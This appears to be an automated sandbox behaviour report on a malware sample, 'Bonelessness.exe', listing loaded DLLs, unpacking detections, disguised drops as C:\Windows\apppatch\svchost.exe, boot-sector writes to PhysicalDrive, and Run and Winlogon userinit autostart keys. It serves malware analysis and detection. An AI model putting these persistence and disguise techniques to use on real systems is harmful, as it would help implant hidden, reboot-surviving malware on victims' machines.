Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: winscard.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: sensapi.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: dbgcore.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: winscard.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: sensapi.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: dbgcore.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Section loaded: profapi.dll

Source: C:\Users\user\Desktop\Bonelessness.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32

Jump to behavior

Source: Bonelessness.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Bonelessness.exe	Unpacked PE file: 0.2.Bonelessness.exe.400000.1.unpack .ZYkKE:R;.peSRE:ER;.ig:R;.data:W;.LI:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\apppatch\svchost.exe	Unpacked PE file: 1.2.svchost.exe.400000.1.unpack .ZYkKE:R;.peSRE:ER;.ig:R;.data:W;.LI:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Unpacked PE file: 5.2.JbrLYfXaOpqnSngA.exe.2890000.3.unpack
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Unpacked PE file: 6.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Unpacked PE file: 21.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Unpacked PE file: 35.2.JbrLYfXaOpqnSngA.exe.3290000.3.unpack
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Unpacked PE file: 39.2.JbrLYfXaOpqnSngA.exe.2940000.3.unpack

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Bonelessness.exe	Unpacked PE file: 0.2.Bonelessness.exe.400000.1.unpack
Source: C:\Windows\apppatch\svchost.exe	Unpacked PE file: 1.2.svchost.exe.400000.1.unpack

Source: C:\Users\user\Desktop\Bonelessness.exe

Code function: 0_2_004020C0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,

0_2_004020C0

Source: initial sample

Static PE information: section where entry point is pointing to: .peSRE

Source: svchost.exe.0.dr	Static PE information: real checksum: 0x5da12987 should be: 0x3bfb4
Source: Bonelessness.exe	Static PE information: real checksum: 0x325ee3da should be: 0x3bfb4

Source: Bonelessness.exe	Static PE information: section name: .ZYkKE
Source: Bonelessness.exe	Static PE information: section name: .peSRE
Source: Bonelessness.exe	Static PE information: section name: .ig
Source: Bonelessness.exe	Static PE information: section name: .LI
Source: svchost.exe.0.dr	Static PE information: section name: .ZYkKE
Source: svchost.exe.0.dr	Static PE information: section name: .peSRE
Source: svchost.exe.0.dr	Static PE information: section name: .ig
Source: svchost.exe.0.dr	Static PE information: section name: .LI

Source: C:\Users\user\Desktop\Bonelessness.exe	Code function: 0_2_0044AD50 push eax; ret	0_2_0044AD7E
Source: C:\Users\user\Desktop\Bonelessness.exe	Code function: 0_2_022B0802 push ebx; ret	0_2_022B084C
Source: C:\Users\user\Desktop\Bonelessness.exe	Code function: 0_2_022B084D push dword ptr [esp+48h]; ret	0_2_022B091C
Source: C:\Users\user\Desktop\Bonelessness.exe	Code function: 0_2_022B0FB8 push C0C66DD3h; retf	0_2_022B10C7
Source: C:\Users\user\Desktop\Bonelessness.exe	Code function: 0_2_022B1784 push ebx; iretd	0_2_022B178E
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_0044AD50 push eax; ret	1_2_0044AD7E
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D68AE3 push cs; ret	1_2_02D68AF8
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D68B19 push cs; iretd	1_2_02D68B28
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D64950 push eax; ret	1_2_02D6497E
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D6844D push es; iretd	1_2_02D6845C
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02505D50 push eax; ret	1_2_02505D7E
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02981784 push ebx; iretd	1_2_0298178E
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02980FB8 push C0C66DD3h; retf	1_2_029810C7
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02980802 push ebx; ret	1_2_0298084C
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_0298084D push dword ptr [esp+48h]; ret	1_2_0298091C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028D8AE3 push cs; ret	5_2_028D8AF8
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028D8B19 push cs; iretd	5_2_028D8B28
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028D4950 push eax; ret	5_2_028D497E
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028D844D push es; iretd	5_2_028D845C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_00E898E3 push cs; ret	5_2_00E898F8
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_00E6C8AC push ebp; retf	5_2_00E6C8AD
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_00E761BC push ebp; retf	5_2_00E761BD
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_00E89919 push cs; iretd	5_2_00E89928
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_00E8924D push es; iretd	5_2_00E8925C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_00E86207 push cs; retf 0004h	5_2_00E86301
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_00E76442 push ebp; retf	5_2_00E76443
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_00E85D50 push eax; ret	5_2_00E85D7E
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_00E85E42 push eax; retf	5_2_00E85E69
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_00E85F4C pushad ; retn 0004h	5_2_00E85F55
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_00E85F22 push ds; ret	5_2_00E85F29
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_02488AE3 push cs; ret	6_2_02488AF8

Persistence and Installation Behavior

Contains functionality to infect the boot sector

Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	1_2_02D33000
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	5_2_028A3000
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	6_2_02453000
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	8_2_012F3000

Drops PE files with benign system names

Source: C:\Users\user\Desktop\Bonelessness.exe

File created: C:\Windows\apppatch\svchost.exe

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\Bonelessness.exe

Executable created and started: C:\Windows\apppatch\svchost.exe

Jump to behavior

Source: C:\Users\user\Desktop\Bonelessness.exe

Code function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\

0_2_004033B0

Source: C:\Users\user\Desktop\Bonelessness.exe

File created: C:\Windows\apppatch\svchost.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Bonelessness.exe

File created: C:\Windows\apppatch\svchost.exe

Jump to dropped file

Boot Survival

Contains functionality to infect the boot sector

Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	1_2_02D33000
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	5_2_028A3000
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	6_2_02453000
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	8_2_012F3000

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run userinit

Jump to behavior

Creates an undocumented autostart registry key

Source: C:\Windows\apppatch\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinit

Jump to behavior

Monitors registry run keys for changes

Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
